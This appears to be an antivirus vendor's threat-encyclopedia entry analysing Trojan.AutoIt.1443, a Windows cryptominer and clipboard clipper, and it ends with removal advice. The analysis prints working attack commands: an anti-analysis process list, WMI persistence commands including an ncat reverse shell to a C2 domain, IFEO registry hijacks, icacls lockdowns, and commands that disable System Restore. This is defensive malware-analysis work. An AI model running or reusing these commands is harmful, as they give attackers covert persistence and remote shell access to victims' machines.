Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Trojan.AutoIt.1443

Added to the Dr.Web virus database: 2024-08-27

Virus description added:

  • 09cffca796dce03c74950e10a349079d9afe3964
  • 419ef7dc18d178247daf68f0571a3dccb662792f
  • 9c17f83aba6b60c8d461a923050fc9a19e386ec1
  • e7ac807a446640a95a961fb5d873c051ee8c2793

Description

Malicious Autoit script for OS Windows that drops a number of files to a compromised PC to implement hidden cryptocurrency mining and spoof data in the clipboard.

Operating routine

The script is launched by a dropper, which is a self-extracting archive. Once launched, Trojan.AutoIt.1443 will perform the following actions:

1. Check the process list for the following lines from the list below:


dUcAvastUI.exe
avgui.exe
avp.exe
avpui.exe
UninstallTool.exe
UninstallToolHelper.exe
SandboxieRpcSs.exe
SandboxieDcomLaunch.exe
httpdebuggerui.exe
wireshark.exe
fiddler.exe
vboxservice.exe
df5serv.exe
vboxtray.exe
vmtoolsd.exe
vmwaretray.exe
ida64.exe
ollydbg.exe
pIIfaXUcjllboZRestudio.exe
vmwareuser.exe
vgauthservice.exe
vmacthlp.exe
vmsrvc.exe
x32dbg.exe
x64dbg.exe
x96dbg.exe
vmusrvc.exe
prl_cc.exe
prl_tools.exe
qemu-ga.exe
joeboxcontrol.exe
ksdumperclient.exe
xenservice.exe
joeboxserver.exe
devenv.exe
immunitydebugger.exe
importrec.exe
windbg.exe
32dbg.exe
64dbg.exex
protection_id.exex
scylla_x86.exe
scylla_x64.exe
scylla.exe
idau64.exe
idau.exe
idaq64.exe
idaq.exe
idaw.exe
idag64.exe
idag.exe
ida.exe

If any of these processes are found, the script will terminate.

2. Create directories

C:\ProgramData\NUL..
C:\ProgramData\AUX..
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Set the SYSTEM, HIDDEN and READONLY attributes for the following directories: C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} and C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}.

3. Unpack files

C:\ProgramData\NUL..\libssl-1_1.dll
C:\ProgramData\NUL..\vcruntime140.dll
C:\ProgramData\NUL..\libcrypto-1_1.dll
C:\ProgramData\NUL..\StartMenuExperienceHost.exe

These files are not malicious. They are required to implement network communication through the StartMenuExperienceHost.exe executable, which is a renamed ncat.exe. This file connects to the attacker's C2 server. It is detected as Tool.Ncat.1.

C:\ProgramData\AUX..\ShellExt.dll
C:\ProgramData\AUX..\DeviceId.dll

The ShellExt.dll file, which is unpacked to all directories created above, is a renamed AutoIt language interpreter. Here it runs a malicious script embedded in the overlay of the DeviceId.dll file, which has a valid digital signature. The script unpacks and launches the SilentCryptoMiner miner (detected as Trojan.BtcMine.3767), which is injected in the explorer.exe process using the Process Hollowing technique.

C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\ShellExt.dll
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\DeviceId.dll

Similarly, in this directory, the AutoIt interpreter (ShellExt.dll) initiated by nun.bat runs a malicious script embedded in the DeviceId.dll file overlay to mine cryptocurrency.

C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun.bat
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellExt.dll
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\7zxa.dll

This set of files is designed to run a clipper hidden in the 7zxa.dll library, which is also injected in explorer.exe using the Process Hollowing technique. The clipper spoofs cryptocurrency wallet addresses in the clipboard.

C:\ProgramData\inst.bat

This script performs the same functions as described below in item 4.1.

4. Create events and modify the registry

4.1 Add events that ensure connection to the C2 server using StartMenuExperienceHost.exe (ncat.exe)


wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nut", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nut", CommandLineTemplate="C:\ProgramData\NUL..\StartMenuExperienceHost.exe --ssl gamesjumpers[.]com 5353 -e cmd.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nut"", Consumer="CommandLineEventConsumer.Name="nut""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nur", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nur", ExecutablePath="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nur"", Consumer="CommandLineEventConsumer.Name="nur""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="per", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="per", ExecutablePath="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="per"", Consumer="CommandLineEventConsumer.Name="per""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="pers", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="pers", CommandLineTemplate="C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\DeviceId[.]dll"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="pers"", Consumer="CommandLineEventConsumer.Name="pers""

4.2 Add registry keys to run malicious files using the IFEO technique


reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MoUsoCoreWorker.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrustedInstaller.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f

5. Configuration

5.1 Change directory permissions by running the following commands

icacls "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}" /deny *S-1-1-0:(DE,WDAC,WO,AS,AD,WEA,DC,WA,WD) /T /C
icacls "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}" /deny *S-1-1-0:(DE,WDAC,WO,AS,AD,WEA,DC,WA,WD) /T /C

This revokes the following permissions:

  • Delete
  • Change discretionary access control list
  • Write permissions for the owner
  • Change access control security settings
  • Create new subfolders and append data
  • Write attributes, including extended attributes
  • Delete subfolders and files
  • Create files and write data

5.2 Disable System Restore by modifying the registry subkeys:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore - DisableSR=1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore - DisableConfig=1

Then, the following command is executed:

reagentc /disable

5.3 Run the C:\ProgramData\inst.bat file

6. Obtain information about the compromised computer

Send a GET request to ip-api[.]com/json to obtain geolocation information. Information about the GPU model and installed antivirus software is collected using the winmgmt.exe utility, the CPU model is retrieved from the HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 registry subkey, and information about the operating system is read from the @OSVersion and @OSArch variables in Autoit.

The received information is sent to the Telegram bot.

Mitre Matrix

Stage Technique
Execution (TA0002) Windows Management Instrumentation (T1047)
Command and Scripting Interpreter (T1059)
Scripting (T0853)
Shared Modules (T1129)
Persistence (TA0003) Event Triggered Execution (T1546)
Image File Execution Options Injection (T1546.011)
Boot or Logon Autostart Execution (T1547)
Registry Run Keys / Startup Folder (T1547.001)
Hijack Execution Flow (T1574)
DLL Side-Loading (T1574.002)
Services File Permissions Weakness (T1574.010)
Privilege Escalation (TA0004) Process Injection (T1055)
Process Hollowing (T1055.012)
Event Triggered Execution (T1546)
Image File Execution Options Injection (T1546.012)
Registry Run Keys / Startup Folder (T1547.001)
Defense Evasion (TA0005) Obfuscated Files or Information (T1027)
Masquerading (T1036)
Process Injection (T1055)
Process Hollowing (T1055.012)
Indicator Removal (T1070)
File Deletion (T1070.004)
Modify Registry (T1112)
File and Directory Permissions Modification (T1222)
Hide Artifacts (T1564)
Hidden Files and Directories (T1564.001)
Virtualization/Sandbox Evasion (T1497)
Discovery (TA0007) System Information Discovery (T1082)
Software Discovery (T1518)
System Location Discovery (T1614)
Collection (TA0009) Clipboard Data (T1115)
Screen Capture (T1113)
Command and Control (TA0011) Encrypted Channel (T1573)
Impact (TA0040) System Shutdown/Reboot (T1529)

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android